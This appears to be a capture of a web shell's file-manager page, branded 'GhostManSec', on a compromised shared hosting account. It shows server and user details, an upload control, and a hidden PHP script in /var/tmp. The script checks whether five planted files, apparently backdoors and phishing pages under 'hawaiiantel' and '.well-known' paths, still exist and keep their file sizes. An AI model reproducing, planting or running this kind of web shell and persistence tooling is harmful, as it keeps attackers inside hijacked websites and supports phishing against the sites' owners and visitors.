GhostManSec
Server: LiteSpeed
System: Linux server251.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: moroqbvm (12347)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //var/tmp/.pset
<?php   $r = '/home/moroqbvm/hawaiian.moroccotourswithlocals.com'; $x = ["/.well-known/set_backlink.php"=>"bd@@451400@@12",
"/hawaiiantel/processing/uploadPage.php"=>"bd@@451403@@596",
"/Ov.Simple1.php"=>"bd@@451406@@585",
"/.well-known/pki-validation/busi_report05.php"=>"bd@@451407@@970",
"/hawaiiantel/action.module.php"=>"bd@@451409@@617"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');